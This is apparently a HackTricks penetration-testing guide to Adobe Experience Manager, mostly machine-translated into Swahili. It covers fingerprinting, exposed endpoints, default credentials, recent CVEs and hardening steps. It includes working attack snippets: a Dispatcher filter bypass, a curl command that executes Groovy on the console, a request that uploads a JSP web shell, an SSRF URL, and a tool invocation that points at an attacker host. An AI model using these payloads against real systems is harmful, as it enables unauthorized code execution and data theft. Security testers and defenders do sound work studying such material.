AEM (Adobe Experience Manager) Pentesting

Reading time: 5 minutes

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Adobe Experience Manager (AEM, sehemu ya Adobe Experience Cloud) ni CMS ya biashara inayotumia Apache Sling/Felix (OSGi) na Java Content Repository (JCR). Kutoka kwa mtazamo wa mshambuliaji, mifano ya AEM mara nyingi huonyesha hatari za maendeleo, sheria dhaifu za Dispatcher, akreditivu za default na orodha ndefu ya CVEs ambazo zinarekebishwa kila robo mwaka.

Orodha ya ukaguzi hapa chini inazingatia uso wa shambulio unaoweza kufikiwa kwa nje (unauth) ambao unaendelea kuonekana katika ushirikiano halisi (2022-2025).

1. Fingerprinting

$ curl -s -I https://target | egrep -i "aem|sling|cq"
X-Content-Type-Options: nosniff
X-Dispatcher: hu1            # header added by AEM Dispatcher
X-Vary: Accept-Encoding

Other quick indicators:

  • /etc.clientlibs/ njia ya kudumu inapatikana (inarudisha JS/CSS).
  • /libs/granite/core/content/login.html ukurasa wa kuingia wenye bendera ya β€œAdobe Experience Manager”.
  • </script><!--/* CQ */--> maoni chini ya HTML.

2. Mipaka ya juu ya thamani zisizo na uthibitisho

PathUnachopataMaelezo
/.json, /.1.jsonJCR nodes kupitia DefaultGetServletMara nyingi imezuiwa, lakini Dispatcher bypass (angalia chini) inafanya kazi.
/bin/querybuilder.json?path=/QueryBuilder APIKuvuja kwa mti wa ukurasa, njia za ndani, majina ya watumiaji.
/system/console/status-*, /system/console/bundlesOSGi/Felix console403 kwa kawaida; ikiwa imefunuliwa & sifa zimepatikana β‡’ bundle-upload RCE.
/crx/packmgr/index.jspPackage ManagerInaruhusu pakiti za maudhui zilizothibitishwa β†’ kupakia mzigo wa JSP.
/etc/groovyconsole/**AEM Groovy ConsoleIkiwa imefunuliwa β†’ utekelezaji wa Groovy / Java bila mipaka.
/libs/cq/AuditlogSearchServlet.jsonKumbukumbu za ukaguziUfunuo wa taarifa.
/libs/cq/ui/content/dumplibs.htmlMzigo wa ClientLibsXSS vector.

Njia ya kupita ya Dispatcher

Tovuti nyingi za uzalishaji ziko nyuma ya Dispatcher (reverse-proxy). Kanuni zake za filtrering zinaweza kupitishwa kwa kuongeza kiambishi cha kudumu baada ya alama ya semikolon au newline iliyosimbwa:

GET /bin/querybuilder.json;%0aa.css?path=/home&type=rep:User HTTP/1.1

A single request like above frequently discloses user profile nodes with email addresses. P-T Partners published good guidance on this weakness. 【】

3. Makosa ya kawaida ya usanidi (bado yanaendelea mwaka 2025)

  1. Anonymous POST servlet – POST /.json with :operation=import lets you plant new JCR nodes. Blocking *.json POST in the Dispatcher fixes it. 【】
  2. Profaili za watumiaji zinazoweza kusomwa na kila mtu – default ACL grants jcr:read on /home/users/**/profile/* to everyone.
  3. Akawali za default – admin:admin, author:author, replication:replication.
  4. WCMDebugFilter enabled β‡’ reflected XSS via ?debug=layout (CVE-2016-7882, still found on legacy 6.4 installs).
  5. Groovy Console exposed – remote code execution by sending a Groovy script:
bash
curl -u admin:admin -d 'script=println "pwn".execute()' https://target/bin/groovyconsole/post.json

4. Uthibitisho wa hivi karibuni (mzunguko wa huduma)

QuarterCVEAffectedImpact
Dec 2024CVE-2024-437116.5.21 and earlierImproper input validation β†’ Arbitrary code execution (requires low-priv auth). 【】
Dec 2024CVE-2024-43724/266.5.21 and earlierDOM / Stored XSS in Move Page Wizard. 【】
Dec 2023CVE-2023-48452/68≀ 6.5.18DOM-based XSS via crafted URL. 【】
Dec 2022CVE-2022-30683≀ 6.5.13Crypto design flaw β†’ secret decryption (needs low-priv creds). 【】

Always check the APSB bulletin matching the customer’s service-pack and request the latest 6.5.22 or Cloud Service 2024.11.

5. Vipande vya unyakuzi

5.1 RCE kupitia bypass ya dispatcher + upakuaji wa JSP

If anonymous write is possible:

# 1. Create a node that will become /content/evil.jsp
POST /content/evil.jsp;%0aa.css HTTP/1.1
Content-Type: application/x-www-form-urlencoded

:contentType=text/plain
jcr:data=<% out.println("pwned"); %>
:operation=import

Sasa omba /content/evil.jsp – JSP inafanya kazi na mtumiaji wa mchakato wa AEM.

5.2 SSRF hadi RCE (historia < 6.3)

/libs/mcm/salesforce/customer.html;%0aa.css?checkType=authorize&authorization_url=http://127.0.0.1:4502/system/console aem_ssrf2rce.py kutoka aem-hacker inafanya mchakato mzima kiotomatiki. 【】

6. Zana

  • aem-hacker – skripti ya kuorodhesha ya Swiss-army, inasaidia kupita dispatcher, kugundua SSRF, ukaguzi wa default-creds na zaidi.
bash
python3 aem_hacker.py -u https://target --host attacker-ip
  • Content Brute-force – omba kwa kurudiarudia /_jcr_content.(json|html) ili kugundua vipengele vilivyofichwa.
  • osgi-infect – pakia OSGi bundle hatari kupitia /system/console/bundles ikiwa akauti zinapatikana.

7. Orodha ya kuimarisha (kwa mapendekezo ya ripoti yako)

  1. Hifadhi mfano kwenye pakiti ya huduma ya hivi karibuni (kuanzia Julai 2025: 6.5.22).
  2. Ondoa/zungusha akaunti za default; tekeleza SSO/SAML.
  3. Imarisha Dispatcher filters – kataa ;, mistari mipya iliyokodishwa, na *.json au *.querybuilder.json kwa watumiaji wasiojulikana.
  4. Zima au linda consoles (/system/console, /crx/*, /etc/groovyconsole) kwa orodha za ruhusa za IP.
  5. Tekeleza pakiti ya Anonymous Permission Hardening iliyotolewa na Adobe.

Marejeleo

  • Adobe Security Bulletin APSB24-69 – β€œMaktaba za usalama kwa Adobe Experience Manager (Desemba 2024)”.
  • 0ang3el – zana ya aem-hacker (GitHub).

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks